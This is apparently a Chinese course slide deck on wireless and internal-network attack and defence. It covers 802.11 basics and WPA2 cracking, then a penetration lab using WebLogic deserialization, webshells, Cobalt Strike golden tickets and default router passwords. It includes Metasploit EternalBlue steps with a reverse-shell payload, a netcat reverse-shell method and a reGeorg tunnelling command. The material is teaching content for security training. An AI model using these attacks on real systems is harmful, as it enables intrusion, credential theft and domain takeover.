版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
無線網(wǎng)絡(luò)攻防技術(shù)無線網(wǎng)絡(luò)攻防概述無線網(wǎng)絡(luò)攻擊無線局域網(wǎng)-WLANWLAN(WirelessLocalAreaNetwork,無線局域網(wǎng)),以無線信道作傳輸媒介的計算機局域網(wǎng),是有線聯(lián)網(wǎng)方式的重要補充和延伸。廣泛適用于需要可移動數(shù)據(jù)處理或無法進行物理傳輸介質(zhì)布線的領(lǐng)域隨著IEEE802.11無線網(wǎng)絡(luò)標準的制定與發(fā)展,使無線網(wǎng)絡(luò)技術(shù)更加成熟與完善。WLAN產(chǎn)品主要包括:無線接入點、無線網(wǎng)卡、無線路由器、無線網(wǎng)關(guān)、無線網(wǎng)橋等無線局域網(wǎng)基本概念無線局域網(wǎng)的傳輸媒質(zhì)分為無線電波和光波兩類無線電波主要使用無線電波和微波,光波主要使用紅外線無線電波和微波頻率由各個國家的無線電管理部門規(guī)定,分為專用頻段和自由頻段。專用頻段需要經(jīng)過批準的獨自有償使用的頻段;自由頻段主要是指ISM頻段(Industrical,Scientific,Medical)什么是Wi-Fi?WiFi的全稱是WirelessFidelity,又叫802.11標準,是IEEE定義的一個無線網(wǎng)絡(luò)通信的工業(yè)標準該技術(shù)使用的使2.4GHz或者5.0GHz附近的頻段802.11b最高帶寬為11Mbps,802.11g最高達54Mbps,802.11n則可達600Mbps其主要特性為:速度快,可靠性高,在開放性區(qū)域,通訊距離可達305米,在封閉性區(qū)域,通訊距離為76米到122米,方便與現(xiàn)有的有線以太網(wǎng)絡(luò)整合,組網(wǎng)的成本更低WLAN與Wi-Fi的區(qū)別?Wlan是無線網(wǎng)絡(luò)的縮寫,又叫做無線局域網(wǎng)。WIFI是無線網(wǎng)絡(luò)中的一個標準,比如說那些IEEE802.11a、b、g、n之類的都屬于WIFI這個標準。802.11標準802.11 1997年IEEE無線局域網(wǎng)標準制定802.11b 2.4GHz直序擴頻傳輸速率1Mbps-11Mbps802.11a 5GHz正交頻分復(fù)用傳輸速率6Mbps-54Mbps802.11g 2.4GHz,兼容802.11b,傳輸速率到22Mbps802.1x基于端口的訪問控制協(xié)議(Portbasednetworkaccesscontrolprotocol)802.11i 增強WIFI數(shù)據(jù)加密和認證(WPA,RSN)802.11e QoS服務(wù)802.11n 更高質(zhì)量,更高速度,達到以太網(wǎng)性能水平WAPI 國標GB15629.11-2003無線局域網(wǎng)鑒別與保密基礎(chǔ)結(jié)構(gòu)(WAI
WPI)IEEE802.11802.11標準1990年IEEE802標準化委員會成立IEEE802.11無線局域網(wǎng)標準工作組該標準定義物理層和媒體訪問控制(MAC)規(guī)范物理層定義了數(shù)據(jù)傳輸?shù)男盘柼卣骱驼{(diào)制,工作在2.4000~2.4835GHz頻段IEEE802.11是IEEE最初制定的一個無線局域網(wǎng)標準,主要用于難于布線的環(huán)境或移動環(huán)境中計算機的無線接入,由于傳輸速率最高只能達到2Mbps,所以,業(yè)務(wù)主要被用于數(shù)據(jù)的存取IEEE802.11a802.11標準1999年,IEEE802.11a標準制定完成,該標準規(guī)定無線局域網(wǎng)工作頻段在5.15~5.825GHz,數(shù)據(jù)傳輸速率達到54Mbps/72Mbps(Turbo),傳輸距離控制在10~100米802.11a采用正交頻分復(fù)用(OFDM)的獨特擴頻技術(shù)可提供25Mbps的無線ATM接口和10Mbps的以太網(wǎng)無線幀結(jié)構(gòu)接口,以及TDD/TDMA的空中接口支持語音、數(shù)據(jù)、圖像業(yè)務(wù);一個扇區(qū)可接入多個用戶,每個用戶可帶多個用戶終端IEEE802.11b802.11標準1999年9月IEEE802.11b被正式批準,該標準規(guī)定無線局域網(wǎng)工作頻段在2.4~2.4835GHz,數(shù)據(jù)傳輸速率達到11Mbps該標準是對IEEE802.11的一個補充,采用點對點模式和基本模式兩種運作模式,在數(shù)據(jù)傳輸速率方面可以根據(jù)實際情況在11Mbps、5.5Mbps、2Mbps、1Mbps的不同速率間自動切換,而且在2Mbps、1Mbps速率時與802.11兼容802.11b使用直接序列(DirectSequence)DSSS作為協(xié)議802.11b和工作在5GHz頻率上的802.11a標準不兼容由于價格低廉,802.11b產(chǎn)品已經(jīng)被廣泛地投入市場,并在許多實際工作場所運行IEEE802.11e/f/h802.11標準IEEE802.11e標準對無線局域網(wǎng)MAC層協(xié)議提出改進,以支持多媒體傳輸,以支持所有無線局域網(wǎng)無線廣播接口的服務(wù)質(zhì)量保證QoS機制IEEE802.11f,定義訪問節(jié)點之間的通信,支持IEEE802.11的接入點互操作協(xié)議(IAPP)IEEE802.11h用于802.11a的頻譜管理技術(shù)IEEE802.11g802.11標準IEEE的802.11g標準是對流行的802.11b(即Wi-Fi標準)的提速(速度從802.11b的11Mb/s提高到54Mb/s)802.11g接入點支持802.11b和802.11g客戶設(shè)備。同樣,采用802.11g網(wǎng)卡的筆記本電腦也能訪問現(xiàn)有的802.11b接入點和新的802.11g接入點802.11a的主要缺點是不能和802.11b設(shè)備互操作,而且與802.11b相比,802.11a網(wǎng)卡貴50%,接入點貴35%IEEE802.11n802.11標準Wi-Fi聯(lián)盟在802.11a/b/g后面的一個無線傳輸標準協(xié)議可以將WLAN的傳輸速率由目前802.11a及802.11g提供的54Mbps,提高到300Mbps甚至高達600Mbps802.11n標準至2009年才得到IEEE的正式批準,但采用MIMOOFDM技術(shù)的廠商已經(jīng)很多,包括D-Link,Airgo、Bermai、Broadcom以及杰爾系統(tǒng)、Atheros、思科、Intel等等,產(chǎn)品包括無線網(wǎng)卡、無線路由器等,而且已經(jīng)大量在PC、筆記本電腦中應(yīng)用無線局域網(wǎng)主要組件無線局域網(wǎng)的主要組件包括無線網(wǎng)卡和接入點。1.無線網(wǎng)卡
無線網(wǎng)卡實際上是一種終端無線網(wǎng)絡(luò)設(shè)備,它是需要在無線局域網(wǎng)的無線覆蓋下通過無線連接網(wǎng)絡(luò)進行上網(wǎng)使用的。2.接入點
接入點的作用相當(dāng)于局域網(wǎng)集線器,它在無線局域網(wǎng)和有線網(wǎng)絡(luò)之間傳輸數(shù)據(jù)。接入點通常是通過標準以太網(wǎng)線連接到有線網(wǎng)絡(luò)上,并與無線設(shè)備進行通信。無線網(wǎng)絡(luò)優(yōu)點無線網(wǎng)絡(luò)具有下列優(yōu)點:(1)靈活性和移動性(2)安裝便捷(3)易于進行網(wǎng)絡(luò)規(guī)劃和調(diào)整(4)故障定位容易(5)易于擴展無線網(wǎng)絡(luò)缺點無線網(wǎng)絡(luò)也具有下列缺點:
(1)性能無線局域網(wǎng)是依靠無線電波進行傳輸?shù)摹?2)速率無線速率是無線網(wǎng)絡(luò)的關(guān)鍵參數(shù),它表明了無線設(shè)備支持多少帶寬,也就是說能有多少速率來互相連接。
(3)安全性無線網(wǎng)絡(luò)容易遭到信息篡改,可以做到無聲無息地對信息進行劫持。無線安全加密方式無線路由器主要提供三種無線安全加密方式,分別為:WEP(WiredEquivalentPrivacy):WEP算法是一種可選的鏈路層安全機制,用來提供訪問控制,數(shù)據(jù)加密和安全性檢驗等。WPA(WiFiProtectedAccess):WPA是一種保護無線網(wǎng)絡(luò)的安全協(xié)議,是一種比WEP強大的加密算法,使用預(yù)共享密鑰和臨時密鑰完整性協(xié)議進行加密。WPA2(WiFiProtectedAccess2):WPA2是基于WPA的一種新的加密方式。WPA2是WPA的升級版,新型的網(wǎng)卡、AP都支持WPA2加密。無線網(wǎng)絡(luò)拓撲結(jié)構(gòu)案例北京無線信息共用網(wǎng)RADIUS服務(wù)器RadiusServer網(wǎng)管服務(wù)器NMSServer計費服務(wù)器BillingServer企業(yè)內(nèi)部網(wǎng)EnterpriseIntranetVPN網(wǎng)關(guān)INTERNETorInternationalWirelessISP接入控制器AccessControllor無線接入點AccessPoint無線局域網(wǎng)安全問題無線局域網(wǎng)安全風(fēng)險
隱患1--信號泄漏信號泄漏未授權(quán)訪問敏感數(shù)據(jù)竊取一臺被部署在商業(yè)大廈上的無線接入點發(fā)射的信號,最遠傳輸?shù)?個街區(qū)外…隱患2--各種接入認證業(yè)務(wù)CMCCChinaNetChinaUnicomCECT-Chinacom…VPN+UDP53=Free?。‰[患3--接入之后的杯具…登錄憑證敏感數(shù)據(jù)更多隱私隱患3--接入之后的杯具…SessionHijack--作為中間人參與通信中--監(jiān)聽通信內(nèi)容,截獲敏感信息--代替某一方,接管會話--篡改正常數(shù)據(jù),插入惡意數(shù)據(jù)隱患4--電信家用AP的噩夢隱患4-設(shè)備固件可能存在的漏洞口令驗證繞過口令泄漏緩沖區(qū)溢出配置文件下載….隱患5--無線數(shù)據(jù)加密破解高強度128位WEP密碼破解長度:128位用時:1分27秒捕獲數(shù)據(jù)包:
47872個WPA破解Other…隱患6--無線拒絕服務(wù)攻擊點到面的攻擊區(qū)域性空間性基于鏈路層攻擊--Airjack、File2air--Macfld、void11無線網(wǎng)絡(luò)安全機制與防護措施通常網(wǎng)絡(luò)的安全性主要體現(xiàn)在兩個方面:一是訪問控制,另一個是數(shù)據(jù)加密。常見措施:1.對無線網(wǎng)絡(luò)進行加密2.設(shè)置MAC地址過濾3.使用靜態(tài)IP地址4.改變服務(wù)集標識符并且禁止SSID廣播5.采用身份驗證和授權(quán)無線網(wǎng)絡(luò)攻防概述無線網(wǎng)絡(luò)攻擊挖掘隱藏SSID在無線網(wǎng)絡(luò)中,AP會定期廣播SSID信息,向外通告無線網(wǎng)絡(luò)的存在,無線用戶使用無線網(wǎng)卡發(fā)現(xiàn)無線網(wǎng)絡(luò)。為避免無線網(wǎng)絡(luò)被非法用戶通過SSID搜索到,可以禁用AP廣播功能,隱藏SSID。但無線網(wǎng)卡連接無線網(wǎng)絡(luò)時,需要手動添加SSID才能關(guān)聯(lián)成功。SSID可以通過嗅探無線環(huán)境中的數(shù)據(jù)包獲取。突破MAC過濾限制無線MAC地址過濾功能,就是允許或禁止指定的MAC地址連接無線網(wǎng)絡(luò),突破MAC地址過濾需要捕獲正常連接的無線客戶端MAC地址,然后更改MAC地址來偽造身份。破解WPA2口令WPA/WPA2目前只能通過字典破解,先抓取連接無線時四次握手過程中的數(shù)據(jù)包,然后通過暴力破解的方法破解抓取的握手包。這個數(shù)據(jù)包中含有預(yù)共享密鑰,所抓取的數(shù)據(jù)包必須是認證過程中產(chǎn)生的數(shù)據(jù)包。因為WPA增加了身份認證機制,在沒有通過認證的時候,只允許認證信息通過。所以在沒有正確的預(yù)共享密鑰的時候,是無法抓取到四步握手過程中的數(shù)據(jù)包。總結(jié)1、了解無線網(wǎng)絡(luò)基本概念2、了解無線網(wǎng)絡(luò)體系架構(gòu)3、
掌握無線網(wǎng)絡(luò)優(yōu)缺點4、掌握無線網(wǎng)絡(luò)安全機制與防護內(nèi)網(wǎng)Windows環(huán)境攻擊實踐前言當(dāng)我們在進行內(nèi)網(wǎng)滲透中,經(jīng)常會遇到一些環(huán)境問題,比如拿下的目標機和自身的機器均處于內(nèi)網(wǎng)之中,這時候想要對目標機內(nèi)網(wǎng)進行滲透就會遇到一系列的問題。比如我如何用掃描器掃對方的內(nèi)網(wǎng)?我沒公網(wǎng)IP如何遠程登錄對方內(nèi)網(wǎng)主機?這些問題如何解決呢?CobaltStrike工具實驗環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用CobaltStrike獲取Shell會話域環(huán)境信息收集域主機攻擊CobaltStrike工具CobaltStrike是一款滲透測試工具,CobaltStrike分為客戶端與服務(wù)端,服務(wù)端是單獨一個,客戶端可以有多個,可用于團隊進行分布式協(xié)同操作。CobaltStrike工具結(jié)構(gòu)團隊服務(wù)器創(chuàng)建與連接CobaltStrike用戶接口分為兩部分,接口的頂部是會話或目標的圖形展示,接口的底部展示了每個與之交互的會話標簽頁。用戶接口如下圖所示內(nèi)網(wǎng)滲透SystemProfiler是一個為客戶端攻擊提供的偵察工具,工具啟動一個本地的Web服務(wù)器,并對訪問它的任何應(yīng)用進行指紋識別。SystemProfiler提供一個它從用戶的瀏覽器里發(fā)現(xiàn)的應(yīng)用和插件的列表,也會嘗試去發(fā)現(xiàn)代理服務(wù)器背后的用戶的內(nèi)網(wǎng)IP地址。CobaltStrike工具實驗環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用CobaltStrike獲取Shell會話域環(huán)境信息收集域主機攻擊實驗環(huán)境過程整個實驗過程大致如下:1) 攻擊者對Web網(wǎng)站進行信息掃描,掃描結(jié)果顯示7001端口開放,7001端口默認對應(yīng)WebLogic服務(wù),存在反序列化遠程命令執(zhí)行漏洞。2) 使用java反序列化終極測試工具上傳木馬到Web網(wǎng)站。3) 通過冰蝎連接Webshell木馬并上傳后門程序。4) 利用MS14-058(即CVE-2014-4113)將會話提權(quán)到system權(quán)限。5) 將Web網(wǎng)站作為跳板機進行內(nèi)網(wǎng)滲透。6) 利用CobaltStrike抓取密碼HASH值生成黃金票據(jù),從而獲取域控權(quán)限同時能夠訪問域內(nèi)其他主機的任何服務(wù)。CobaltStrike工具實驗環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用CobaltStrike獲取Shell會話域環(huán)境信息收集域主機攻擊信息收集途徑公開信息收集存活掃描端口掃描服務(wù)識別掃描系統(tǒng)類型識別漏洞掃描
針對口令的掃描
針對特定安全漏洞的掃描深入獲取系統(tǒng)信息信息收集掃描工具-Nmap被稱為是掃描器之王支持多種掃描技術(shù)目標和端口設(shè)定非常靈活掃描過程根據(jù)網(wǎng)絡(luò)自動調(diào)整端口掃描-Nmap掃描目標端口:Nmap5Nmap–sS5(SYN方式)Nmap–sT5(TCP方式)掃描目標操作系統(tǒng)類型命令:Nmap–O-P05端口掃描-NmapNmap的其他參數(shù):Nmap–sV5(顯示Banner信息)Nmap–p1-505(指定端口范圍)Nmap–v5(輸出更詳細信息)Nmap–F5(快速模式)Nmap–A5(強化掃描模式)Nmap–oXresult.xml5導(dǎo)出掃描結(jié)果到XML文件中Nmap--iflist顯示所有網(wǎng)絡(luò)接口--packet-trace跟蹤顯示每一個掃描數(shù)據(jù)包ZenmapZenmap——
圖形界面的nmap常見端口號21FTP22SSH23Telnet25SMTP53DNS80HTTP110POP3161SNMP443HTTPS513RLogin1433MSSQLServer1521Oracle3306MySQL3389RDP8080ProxyNessus---綜合漏洞掃描綜合漏掃軟件Nessus
Nessus個人使用可以到官網(wǎng)免費申請序列號
Nessus4.2版開始,不再有獨立的客戶端,而是基于Web來進行管理,一般是這樣的形式:https://[ServerIP]:8834Nessus掃描策略Nessus查看掃描結(jié)果口令安全問題口令是很多應(yīng)用系統(tǒng)認證用戶采用的最廣泛的認證方式,但是口令安全問題,給認證帶來了很多安全隱患口令常見安全問題有如下表現(xiàn):
弱口令
明文傳輸
默認值口令問題1——弱口令用戶趨向于選擇容易的口令,甚至空口令用戶會選擇易于記住的東西做口令 Test、guest、google、iphone等
名字、生日、簡單數(shù)字等易于選擇該系統(tǒng)的應(yīng)用 NtServer、oracle等多數(shù)用戶的安全意識薄弱口令問題2——明文傳輸使用明文密碼傳送的應(yīng)用: FTP、POP、Telnet、HTTP、SNMP、Socks Mountd、Rlogin、NNTP、NFS、 ICQ、IRC、PcAnywhere、VNC等 MSSQL、Oracle等上述服務(wù)都容易成為攻擊對象口令問題3——默認值網(wǎng)絡(luò)設(shè)備 CiscoRouteruser:enablepw:cisco 3Com交換機user:adminpw:synnet TPLink無線路由:user:adminpw:adminModem等等數(shù)據(jù)庫 MS-SQL:sa+空口令SNMP Public、Private口令攻擊方式手工猜測
方法:社會工程學(xué)、嘗試默認口令自動猜測
工具:John、LC、NTscan等竊聽:登陸、網(wǎng)絡(luò)截獲、鍵盤監(jiān)聽
工具:Dsniff、SnifferPro、IKS等NtScan--破解Windows系統(tǒng)口令將生成的字典文件重命名為NT_pass.dic,覆蓋Ntscan目錄下的原字典文件NtScan--破解Windows系統(tǒng)口令運行NtScan,如果目標服務(wù)器密碼在字典文件中存在,則會出現(xiàn)如下掃描結(jié)果:緩沖區(qū)溢出緩沖區(qū)溢出攻擊原理
緩沖區(qū)溢出攻擊利用編寫不夠嚴謹?shù)某绦?,通過向程序的緩沖區(qū)寫入超過預(yù)定長度的數(shù)據(jù),造成緩存的溢出,從而破壞程序的堆棧,導(dǎo)致程序執(zhí)行流程的改變。緩沖區(qū)溢出的危害
最大數(shù)量的漏洞類型。
漏洞危害等級高。國家漏洞庫(CNNVD)漏洞統(tǒng)計緩沖區(qū)溢出基礎(chǔ)-堆棧、指針、寄存器堆棧概念
一段連續(xù)分配的內(nèi)存空間。堆棧特點
后進先出。
堆棧生長方向與內(nèi)存地址方向相反。指針
指針是指向內(nèi)存單元的地址。寄存器
暫存指令、數(shù)據(jù)和位址。 ESP(棧頂)、EBP(棧底)、EIP(返回地址)。34H12H78H56H0108HESP棧頂(AL)(AH)34H12H78H56H0106HESP棧頂緩沖區(qū)溢出簡單示例程序作用:將用戶輸入的內(nèi)容打印在屏幕上。Buffer.c#include<stdio.h>intmain(){
charname[8];printf("Pleaseinputyourname:");gets(name);printf("younameis:%s!",name);return0;}緩沖區(qū)溢出示例用戶輸入內(nèi)容在8位以內(nèi)時候,程序正常執(zhí)行用戶輸入內(nèi)容超過8位以后,程序執(zhí)行產(chǎn)生錯誤緩沖區(qū)溢出簡單示例由于返回地址已經(jīng)被覆蓋,函數(shù)執(zhí)行返回地址時會將覆蓋內(nèi)容當(dāng)作返回地址,然后試圖執(zhí)行相應(yīng)地址的指令,從而產(chǎn)生錯誤。當(dāng)我們?nèi)枯斎隺時,錯誤指令地址為0x616161,0x61是a的ASCII編碼緩沖區(qū)溢出攻擊危害如果可精確控制內(nèi)存跳轉(zhuǎn)地址,就可以執(zhí)行指定代碼,獲得權(quán)限或破壞系統(tǒng)。尋找程序漏洞編制緩沖區(qū)溢出程序精確控制跳轉(zhuǎn)地址執(zhí)行設(shè)定的代碼獲得系統(tǒng)權(quán)限或破壞系統(tǒng)歷史上經(jīng)典的緩沖區(qū)溢出漏洞Rpc溢出SQLUDP溢出暴風(fēng)影音2溢出Serv-U溢出漏洞Ms05039Ms06040Ms08067Ms17010(永恒之藍)…緩沖區(qū)漏洞利用-Metasploit平臺介紹溢出攻擊平臺—Metasploit實例—msf攻擊ms-17010漏洞主機1.
searchms17_0102.use
exploit/windows/smb/ms17_010_eternalblue//運行payload3.
setpayloadwindows/x64/meterpreter/reverse_tcp//指定溢出成功后運行的代碼,這里獲取反彈端口的shell4.showoptionsinfo//查看漏洞信息與腳本參數(shù)5.setrhost38//設(shè)定攻擊目標IP6.setlhost36//本機IP7.exploit//開始攻擊8.shell//連接溢出成功后打開的shell終端內(nèi)網(wǎng)滲透場景在我們進行內(nèi)網(wǎng)滲透中,經(jīng)常會遇到一些環(huán)境問題,比如拿下的目標機和自身的機器均處于內(nèi)網(wǎng)之中,這時候想要對目標機內(nèi)網(wǎng)進行滲透就會遇到一系列的問題.比如我如何用掃描器掃對方的內(nèi)網(wǎng)?我沒公網(wǎng)IP如何遠程登錄對方內(nèi)網(wǎng)主機?…端口轉(zhuǎn)發(fā)端口轉(zhuǎn)發(fā)這個我們在內(nèi)網(wǎng)滲透中也是經(jīng)常遇到,可以使用現(xiàn)成的一些工具或者通過腳本命令進行轉(zhuǎn)發(fā)常用的轉(zhuǎn)發(fā)工具:Netcat、Lcx、Htran、FpipeNetcat是大家都很熟悉的一款軟件了,功能十分強大,安全人員必備工具之一。NC使用NC使用:-e參數(shù),例如:我們將一臺win主機shell反彈到一臺linux主機上,win上執(zhí)行。在linux主機上監(jiān)聽此端口Sock代理Sock代理是一種基于傳輸層的網(wǎng)絡(luò)代理協(xié)議,不同于VPN,Sock代理只能對使用該代理協(xié)議的程序生效,因此,可以說它是一種局部代理,而不是像VPN一樣的全局代理,速度也弱于VPN。但在我們滲透測試中,需要盡量對目標機制造出盡可能小的影響,因此,sock代理也經(jīng)常會被用到。Sock代理場景攻擊端和內(nèi)網(wǎng)主機處于同一網(wǎng)絡(luò)環(huán)境下,或者攻擊端具有公網(wǎng)IP,因為在服務(wù)器端運行sock腳本時會需要尋址到客戶端。下面拓撲情況為攻擊端無法直接訪問內(nèi)網(wǎng)主機:socks5代理(reGeorg+proxifier)reGeorgreGeorg是reDuh的繼承者,利用了會話層的socks5協(xié)議,效率更高。proxifierProxifier是一款功能非常強大的socks5客戶端,可以讓不支持通過代理服務(wù)器工作的網(wǎng)絡(luò)程序能通過HTTPS或SOCKS代理或代理鏈。工具配置工具配置先將reGeorg的對應(yīng)腳本上傳到服務(wù)器端,直接訪問顯示“Georgsays,'Allseemsfine'”,表示腳本運行正常工具配置運行py程序:
python
reGeorgSocksProxy.py
-p
8888
-u
http:
///test/tunnel.jsp工具配置將proxifier打開,在ProxyServer中這樣配置工具配置在遠程桌面程序上右鍵,以Proxifier選擇“ProxySOCKS5”打開。ipconfig查詢內(nèi)網(wǎng)機器的ipCobaltStrike工具實驗環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用CobaltStrike獲取Shell會話域環(huán)境信息收集域主機攻擊WeblogicScan掃描漏洞漏洞檢測結(jié)果打開終端,輸入命令cd/home/WeblogicScan,切換到WeblogicScan目錄,輸入命令python3WeblogicScan.py07001,掃描結(jié)果顯示存在CVE-2019-2725漏洞。WeblogicScan掃描漏洞反序列化漏洞在攻擊主機的瀏覽器地址欄中輸入0:7001/_async/AsyncResponseService,測試漏洞是否存在。利用Java反序列化終極測試工具上傳木馬使用Java反序列化終極測試工具上傳木馬到目標主機,目標服務(wù)器選擇Weblogic,目標輸入0:7001/,單擊獲取信息按鈕,回顯目標主機相關(guān)信息。反序列化終極測試工具利用冰蝎連接木馬單擊Webshell上傳標簽,上傳冰蝎木馬文件Webshell上傳CobaltStrike工具實驗環(huán)境Web網(wǎng)站信息收集Web網(wǎng)站漏洞利用利用C
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 《GRP時間管理RevB》課件
- 2025年長沙貨運從業(yè)資格證考試模擬考試題庫答案
- 2025年內(nèi)蒙古貨物運輸從業(yè)資格證考試題
- 2025年廣安貨運資格證考試題
- 2025年石家莊貨運從業(yè)考試試題答案解析
- 粵教版八年級下冊地理-第八章-珠江三角洲-單元檢測
- 社區(qū)用電安全規(guī)定
- 四川省城市排水工程招標文件
- 文化產(chǎn)業(yè)園硅PU施工合同
- 裝卸作業(yè)應(yīng)急預(yù)案
- GA/T 1300-2016社會消防安全培訓(xùn)機構(gòu)設(shè)置與評審
- 高中期末復(fù)習(xí) 高效備考主題班會 課件
- 兒童故事:約瑟夫有件舊外套課件
- 2023年9月新《醫(yī)療器械分類目錄》-自2023年8月1日起施行
- 水池滿水試驗報告
- 兩班倒排班表excel模板
- 數(shù)學(xué)說題大賽評分標準
- 人教版高中英語必修5_unit2The_united_Kingdom_Reading
- 哈汽東芝型超超臨界1000MW汽輪機低壓缸動靜碰磨故障分析與對策
- 溫州市房屋租賃合同-通用版
- 醫(yī)源性冠狀動脈夾層的識別與防治
評論
0/150
提交評論